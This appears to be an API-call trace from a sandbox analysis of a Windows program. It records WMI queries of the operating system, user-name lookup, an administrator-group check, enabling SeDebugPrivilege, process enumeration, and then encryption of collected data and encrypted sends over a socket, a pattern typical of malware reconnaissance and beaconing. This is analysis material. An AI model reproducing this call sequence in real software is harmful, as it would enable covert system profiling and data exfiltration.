	[0127.658] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__PATH", lFlags=0, pVal=0xd7ef71d0b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d0ac*=0, plFlavor=0xd7ef71d0a8*=0 | out: pVal=0xd7ef71d0b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_OperatingSystem=@", varVal2=0x0), pType=0xd7ef71d0ac*=8, plFlavor=0xd7ef71d0a8*=64) returned 0x0
	[0127.658] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_OperatingSystem=@") returned 0x2d
	[0127.658] CoGetObjectContext (in: riid=0xd7ef71d048*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71d040 | out: ppv=0xd7ef71d040*=0x2ad205dbe30) returned 0x0
	[0127.658] IComThreadingInfo:GetCurrentApartmentType (in: This=0x2ad205dbe30, pAptType=0xd7ef71d060 | out: pAptType=0xd7ef71d060*=1) returned 0x0
	[0127.659] IUnknown:QueryInterface (in: This=0x2ad205dbe30, riid=0x2ad238546d8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0xd7ef71d168 | out: ppvObject=0xd7ef71d168*=0x0) returned 0x80004002
	[0127.659] IUnknown:Release (This=0x2ad205dbe30) returned 0x2
	[0127.659] CoGetClassObject (in: rclsid=0x2ad3bb03848*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7ffbf57cd250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0xd7ef71c6d0 | out: ppv=0xd7ef71c6d0*=0x2ad3bb1fa80) returned 0x0
	[0127.659] WbemDefPath:IUnknown:QueryInterface (in: This=0x2ad3bb1fa80, riid=0x7ffbf57cd2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0xd7ef71c3e0 | out: ppvObject=0xd7ef71c3e0*=0x0) returned 0x80004002
	[0127.659] WbemDefPath:IClassFactory:CreateInstance (in: This=0x2ad3bb1fa80, pUnkOuter=0x0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c3c8 | out: ppvObject=0xd7ef71c3c8*=0x2ad3bb12bc0) returned 0x0
	[0127.659] IUnknown:QueryInterface (in: This=0x2ad3bb12bc0, riid=0x7ffbf57cd260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c2d0 | out: ppvObject=0xd7ef71c2d0*=0x2ad3bb12bc0) returned 0x0
	[0127.659] IUnknown:QueryInterface (in: This=0x2ad3bb12bc0, riid=0x7ffbf57cd840*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0xd7ef71c350 | out: ppvObject=0xd7ef71c350*=0x0) returned 0x80004002
	[0127.660] IUnknown:AddRef (This=0x2ad3bb12bc0) returned 0x3
	[0127.660] CoGetContextToken (in: pToken=0xd7ef71bfa0 | out: pToken=0xd7ef71bfa0) returned 0x0
	[0127.660] IUnknown:QueryInterface (in: This=0x2ad3bb12bc0, riid=0x7ffbf57cd2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71bf60 | out: ppvObject=0xd7ef71bf60*=0x2ad3bb1f580) returned 0x0
	[0127.660] IMarshal:GetUnmarshalClass (in: This=0x2ad3bb1f580, riid=0x7ffbf57cd260, pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0xd7ef71bf90 | out: pCid=0xd7ef71bf90) returned 0x0
	[0127.660] IUnknown:Release (This=0x2ad3bb1f580) returned 0x3
	[0127.660] CoGetContextToken (in: pToken=0xd7ef71bf70 | out: pToken=0xd7ef71bf70) returned 0x0
	[0127.660] IUnknown:AddRef (This=0x2ad3bb12bc0) returned 0x4
	[0127.660] IUnknown:QueryInterface (in: This=0x2ad3bb12bc0, riid=0x7ffbf57cd280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xd7ef71c088 | out: ppvObject=0xd7ef71c088*=0x0) returned 0x80004002
	[0127.660] IUnknown:Release (This=0x2ad3bb12bc0) returned 0x3
	[0127.660] IUnknown:Release (This=0x2ad3bb12bc0) returned 0x2
	[0127.660] WbemDefPath:IUnknown:Release (This=0x2ad3bb1fa80) returned 0x0
	[0127.660] IUnknown:Release (This=0x2ad3bb12bc0) returned 0x1
	[0127.660] CoGetContextToken (in: pToken=0xd7ef71cca0 | out: pToken=0xd7ef71cca0) returned 0x0
	[0127.660] CoGetContextToken (in: pToken=0xd7ef71cbe0 | out: pToken=0xd7ef71cbe0) returned 0x0
	[0127.660] IUnknown:AddRef (This=0x2ad3bb12bc0) returned 0x2
	[0127.660] IUnknown:QueryInterface (in: This=0x2ad3bb12bc0, riid=0xd7ef71cd20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71cd00 | out: ppvObject=0xd7ef71cd00*=0x2ad3bb12bc0) returned 0x0
	[0127.660] IUnknown:Release (This=0x2ad3bb12bc0) returned 0x2
	[0127.660] IUnknown:Release (This=0x2ad3bb12bc0) returned 0x1
	[0127.660] CoGetContextToken (in: pToken=0xd7ef71ce20 | out: pToken=0xd7ef71ce20) returned 0x0
	[0127.660] CoGetContextToken (in: pToken=0xd7ef71cd60 | out: pToken=0xd7ef71cd60) returned 0x0
	[0127.661] IUnknown:AddRef (This=0x2ad3bb12bc0) returned 0x2
	[0127.661] IUnknown:QueryInterface (in: This=0x2ad3bb12bc0, riid=0xd7ef71cea0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0xd7ef71ce80 | out: ppvObject=0xd7ef71ce80*=0x2ad3bb12bc0) returned 0x0
	[0127.661] IUnknown:Release (This=0x2ad3bb12bc0) returned 0x2
	[0127.661] IUnknown:AddRef (This=0x2ad3bb12bc0) returned 0x3
	[0127.661] IWbemPath:SetText (This=0x2ad3bb12bc0, uMode=0x4, pszPath="\\\\X2VS1CUM\\root\\cimv2:Win32_OperatingSystem=@") returned 0x0
	[0127.661] IUnknown:Release (This=0x2ad3bb12bc0) returned 0x2
	[0127.661] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb116c0, puCount=0xd7ef71d0e0 | out: puCount=0xd7ef71d0e0*=0x2) returned 0x0
	[0127.661] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d0e0*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d0e0*=0x17, pszText=0x0) returned 0x0
	[0127.661] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d0e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d0e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.661] CoTaskMemAlloc (cb=0x8) returned 0x2ad3bac2e50
	[0127.661] IEnumWbemClassObject:Next (in: This=0x2ad3bb15740, lTimeout=-1, uCount=0x1, apObjects=0x2ad3bac2e50, puReturned=0xd7ef71d198 | out: apObjects=0x2ad3bac2e50*=0x0, puReturned=0xd7ef71d198*=0x0) returned 0x1
	[0127.662] CoTaskMemFree (pv=0x2ad3bac2e50) 
	[0127.662] CoGetContextToken (in: pToken=0xd7ef71cf20 | out: pToken=0xd7ef71cf20) returned 0x0
	[0127.662] IUnknown:Release (This=0x2ad3bb2b248) returned 0x1
	[0127.662] IUnknown:Release (This=0x2ad3bb15740) returned 0x0
	[0127.662] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb116c0, puCount=0xd7ef71d270 | out: puCount=0xd7ef71d270*=0x2) returned 0x0
	[0127.662] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d270*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d270*=0x17, pszText=0x0) returned 0x0
	[0127.662] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d270*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d270*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.662] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71d260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d25c*=0, plFlavor=0xd7ef71d258*=0 | out: pVal=0xd7ef71d260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71d25c*=8, plFlavor=0xd7ef71d258*=64) returned 0x0
	[0127.662] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.662] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d26c*=8, plFlavor=0xd7ef71d268*=64 | out: pVal=0xd7ef71d270*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71d26c*=8, plFlavor=0xd7ef71d268*=64) returned 0x0
	[0127.662] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.663] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb116c0, puCount=0xd7ef71d270 | out: puCount=0xd7ef71d270*=0x2) returned 0x0
	[0127.663] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d270*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d270*=0x17, pszText=0x0) returned 0x0
	[0127.663] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d270*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d270*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.663] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__CLASS", lFlags=0, pVal=0xd7ef71d260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d25c*=0, plFlavor=0xd7ef71d258*=0 | out: pVal=0xd7ef71d260*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0xd7ef71d25c*=8, plFlavor=0xd7ef71d258*=64) returned 0x0
	[0127.663] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0127.663] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__CLASS", lFlags=0, pVal=0xd7ef71d270*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d26c*=8, plFlavor=0xd7ef71d268*=64 | out: pVal=0xd7ef71d270*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0xd7ef71d26c*=8, plFlavor=0xd7ef71d268*=64) returned 0x0
	[0127.663] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0127.663] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb116c0, puCount=0xd7ef71d200 | out: puCount=0xd7ef71d200*=0x2) returned 0x0
	[0127.663] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d200*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d200*=0x17, pszText=0x0) returned 0x0
	[0127.663] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d200*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d200*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.664] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb116c0, puCount=0xd7ef71d200 | out: puCount=0xd7ef71d200*=0x2) returned 0x0
	[0127.664] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d200*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d200*=0x17, pszText=0x0) returned 0x0
	[0127.664] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d200*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d200*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.664] IWbemClassObject:GetNames (in: This=0x2ad206a7b00, wszQualifierName=0x0, lFlags=48, pQualifierVal=0xd7ef71d1f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0xd7ef71d1f0 | out: pNames=0xd7ef71d1f0*="\x01ƀ\x08") returned 0x0
	[0127.664] SafeArrayGetDim (psa=0x2ad3bb04550) returned 0x1
	[0127.664] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__GENUS", lFlags=0, pVal=0xd7ef71d1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d1ec*=0, plFlavor=0xd7ef71d1e8*=0 | out: pVal=0xd7ef71d1f0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0xd7ef71d1ec*=3, plFlavor=0xd7ef71d1e8*=64) returned 0x0
	[0127.664] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__CLASS", lFlags=0, pVal=0xd7ef71d1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d1ec*=0, plFlavor=0xd7ef71d1e8*=0 | out: pVal=0xd7ef71d1f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem", varVal2=0x0), pType=0xd7ef71d1ec*=8, plFlavor=0xd7ef71d1e8*=64) returned 0x0
	[0127.664] SysStringLen (param_1="Win32_OperatingSystem") returned 0x15
	[0127.664] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__SUPERCLASS", lFlags=0, pVal=0xd7ef71d1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d1ec*=0, plFlavor=0xd7ef71d1e8*=0 | out: pVal=0xd7ef71d1f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_OperatingSystem", varVal2=0x0), pType=0xd7ef71d1ec*=8, plFlavor=0xd7ef71d1e8*=64) returned 0x0
	[0127.664] SysStringLen (param_1="CIM_OperatingSystem") returned 0x13
	[0127.664] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__DYNASTY", lFlags=0, pVal=0xd7ef71d1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d1ec*=0, plFlavor=0xd7ef71d1e8*=0 | out: pVal=0xd7ef71d1f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CIM_ManagedSystemElement", varVal2=0x0), pType=0xd7ef71d1ec*=8, plFlavor=0xd7ef71d1e8*=64) returned 0x0
	[0127.664] SysStringLen (param_1="CIM_ManagedSystemElement") returned 0x18
	[0127.664] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__RELPATH", lFlags=0, pVal=0xd7ef71d1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d1ec*=0, plFlavor=0xd7ef71d1e8*=0 | out: pVal=0xd7ef71d1f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_OperatingSystem=@", varVal2=0x0), pType=0xd7ef71d1ec*=8, plFlavor=0xd7ef71d1e8*=64) returned 0x0
	[0127.664] SysStringLen (param_1="Win32_OperatingSystem=@") returned 0x17
	[0127.664] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0xd7ef71d1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d1ec*=0, plFlavor=0xd7ef71d1e8*=0 | out: pVal=0xd7ef71d1f0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x40, varVal2=0x0), pType=0xd7ef71d1ec*=3, plFlavor=0xd7ef71d1e8*=64) returned 0x0
	[0127.664] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__DERIVATION", lFlags=0, pVal=0xd7ef71d1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d1ec*=0, plFlavor=0xd7ef71d1e8*=0 | out: pVal=0xd7ef71d1f0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ad3bb04290*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x2ad3bb1ea20, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0xd7ef71d1ec*=8200, plFlavor=0xd7ef71d1e8*=64) returned 0x0
	[0127.665] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__SERVER", lFlags=0, pVal=0xd7ef71d1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d1ec*=0, plFlavor=0xd7ef71d1e8*=0 | out: pVal=0xd7ef71d1f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="X2VS1CUM", varVal2=0x0), pType=0xd7ef71d1ec*=8, plFlavor=0xd7ef71d1e8*=64) returned 0x0
	[0127.665] SysStringLen (param_1="X2VS1CUM") returned 0x8
	[0127.665] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__NAMESPACE", lFlags=0, pVal=0xd7ef71d1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d1ec*=0, plFlavor=0xd7ef71d1e8*=0 | out: pVal=0xd7ef71d1f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0xd7ef71d1ec*=8, plFlavor=0xd7ef71d1e8*=64) returned 0x0
	[0127.665] SysStringLen (param_1="root\\cimv2") returned 0xa
	[0127.665] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="__PATH", lFlags=0, pVal=0xd7ef71d1f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d1ec*=0, plFlavor=0xd7ef71d1e8*=0 | out: pVal=0xd7ef71d1f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\X2VS1CUM\\root\\cimv2:Win32_OperatingSystem=@", varVal2=0x0), pType=0xd7ef71d1ec*=8, plFlavor=0xd7ef71d1e8*=64) returned 0x0
	[0127.665] SysStringLen (param_1="\\\\X2VS1CUM\\root\\cimv2:Win32_OperatingSystem=@") returned 0x2d
	[0127.665] IWbemPath:GetNamespaceCount (in: This=0x2ad3bb116c0, puCount=0xd7ef71d290 | out: puCount=0xd7ef71d290*=0x2) returned 0x0
	[0127.665] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d290*=0x0, pszText=0x0 | out: puBuffLength=0xd7ef71d290*=0x17, pszText=0x0) returned 0x0
	[0127.665] IWbemPath:GetText (in: This=0x2ad3bb116c0, lFlags=4, puBuffLength=0xd7ef71d290*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0xd7ef71d290*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0127.665] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="NamE", lFlags=0, pVal=0xd7ef71d280*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d27c*=0, plFlavor=0xd7ef71d278*=0 | out: pVal=0xd7ef71d280*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0xd7ef71d27c*=8, plFlavor=0xd7ef71d278*=0) returned 0x0
	[0127.665] SysStringLen (param_1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x40
	[0127.665] IWbemClassObject:Get (in: This=0x2ad206a7b00, wszName="NamE", lFlags=0, pVal=0xd7ef71d4b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xd7ef71d4ac*=8, plFlavor=0xd7ef71d4a8*=0 | out: pVal=0xd7ef71d4b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1", varVal2=0x0), pType=0xd7ef71d4ac*=8, plFlavor=0xd7ef71d4a8*=0) returned 0x0
	[0127.665] SysStringLen (param_1="Microsoft Windows 10 Pro|C:\\Windows|\\Device\\Harddisk0\\Partition1") returned 0x40
	[0127.665] CoTaskMemAlloc (cb=0x204) returned 0x2ad2069dc20
	[0127.665] GetUserNameW (in: lpBuffer=0x2ad2069dc20, pcbBuffer=0xd7ef71d908 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0xd7ef71d908) returned 1
	[0127.666] CoTaskMemFree (pv=0x2ad2069dc20) 
	[0127.734] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71d368 | out: TokenHandle=0xd7ef71d368*=0x9ac) returned 1
	[0127.781] GetTokenInformation (in: TokenHandle=0x9ac, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xd7ef71d308 | out: TokenInformation=0x0, ReturnLength=0xd7ef71d308) returned 0
	[0127.782] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2ad3bac3020
	[0127.782] GetTokenInformation (in: TokenHandle=0x9ac, TokenInformationClass=0x8, TokenInformation=0x2ad3bac3020, TokenInformationLength=0x4, ReturnLength=0xd7ef71d308 | out: TokenInformation=0x2ad3bac3020, ReturnLength=0xd7ef71d308) returned 1
	[0127.782] DuplicateTokenEx (in: hExistingToken=0x9ac, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xd7ef71d468 | out: phNewToken=0xd7ef71d468*=0x9b0) returned 1
	[0127.782] GetTokenInformation (in: TokenHandle=0x9ac, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xd7ef71d308 | out: TokenInformation=0x0, ReturnLength=0xd7ef71d308) returned 0
	[0127.783] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2ad3bac3240
	[0127.783] GetTokenInformation (in: TokenHandle=0x9ac, TokenInformationClass=0x8, TokenInformation=0x2ad3bac3240, TokenInformationLength=0x4, ReturnLength=0xd7ef71d308 | out: TokenInformation=0x2ad3bac3240, ReturnLength=0xd7ef71d308) returned 1
	[0127.783] CheckTokenMembership (in: TokenHandle=0x9b0, SidToCheck=0x2ad238a8d40*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xd7ef71d478 | out: IsMember=0xd7ef71d478) returned 1
	[0127.783] CloseHandle (hObject=0x9b0) returned 1
	[0127.851] GetCurrentProcessId () returned 0x434
	[0127.894] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xd7ef71c900 | out: lpLuid=0xd7ef71c900*(LowPart=0x14, HighPart=0)) returned 1
	[0127.894] GetCurrentProcess () returned 0xffffffffffffffff
	[0127.895] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xd7ef71c920 | out: TokenHandle=0xd7ef71c920*=0x68c) returned 1
	[0127.896] AdjustTokenPrivileges (in: TokenHandle=0x68c, DisableAllPrivileges=0, NewState=0x2ad238ecf88*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0127.896] CloseHandle (hObject=0x68c) returned 1
	[0127.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2ad3326b070, Length=0x20000, ResultLength=0xd7ef71d890 | out: SystemInformation=0x2ad3326b070, ResultLength=0xd7ef71d890*=0x2ad00016bf0) returned 0x0
	[0127.905] CryptContextAddRef (hProv=0x2ad3bb0c310, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0127.905] CryptDuplicateKey (in: hKey=0x2ad3bafc050, pdwReserved=0x0, dwFlags=0x0, phKey=0xd7ef71d6d8 | out: phKey=0xd7ef71d6d8*=0x2ad3bafc2f0) returned 1
	[0127.905] CryptContextAddRef (hProv=0x2ad3bb0c310, pdwReserved=0x0, dwFlags=0x0) returned 1
	[0127.905] CryptSetKeyParam (hKey=0x2ad3bafc2f0, dwParam=0x4, pbData=0x2ad23918d20*=0x1, dwFlags=0x0) returned 1
	[0127.905] CryptSetKeyParam (hKey=0x2ad3bafc2f0, dwParam=0x1, pbData=0x2ad23918cd0, dwFlags=0x0) returned 1
	[0127.906] CryptEncrypt (in: hKey=0x2ad3bafc2f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2ad239197c0*, pdwDataLen=0xd7ef71d7e8*=0x90, dwBufLen=0x90 | out: pbData=0x2ad239197c0*, pdwDataLen=0xd7ef71d7e8*=0x90) returned 1
	[0127.906] CryptEncrypt (in: hKey=0x2ad3bafc2f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ad23919888*, pdwDataLen=0xd7ef71d7e8*=0x0, dwBufLen=0x10 | out: pbData=0x2ad23919888*, pdwDataLen=0xd7ef71d7e8*=0x10) returned 1
	[0127.937] select (in: nfds=0, readfds=0x2ad23c961e8, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71d480 | out: readfds=0x2ad23c961e8, writefds=0x0, exceptfds=0x0) returned 0
	[0127.938] EncryptMessage (in: phContext=0xd7ef71d010, fQOP=0x0, pMessage=0x2ad23c96cb0, MessageSeqNo=0x0 | out: pMessage=0x2ad23c96cb0) returned 0x0
	[0127.938] send (in: s=0x7d0, buf=0x2ad23c96aa8*, len=245, flags=0 | out: buf=0x2ad23c96aa8*) returned 245
	[0127.940] EncryptMessage (in: phContext=0xd7ef71d190, fQOP=0x0, pMessage=0x2ad23c96fd0, MessageSeqNo=0x0 | out: pMessage=0x2ad23c96fd0) returned 0x0
	[0127.941] send (in: s=0x7d0, buf=0x2ad23c96dd8*, len=229, flags=0 | out: buf=0x2ad23c96dd8*) returned 229
	[0127.941] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0127.941] recv (in: s=0x7d0, buf=0x2ad23684c88, len=5, flags=0 | out: buf=0x2ad23684c88*) returned 5
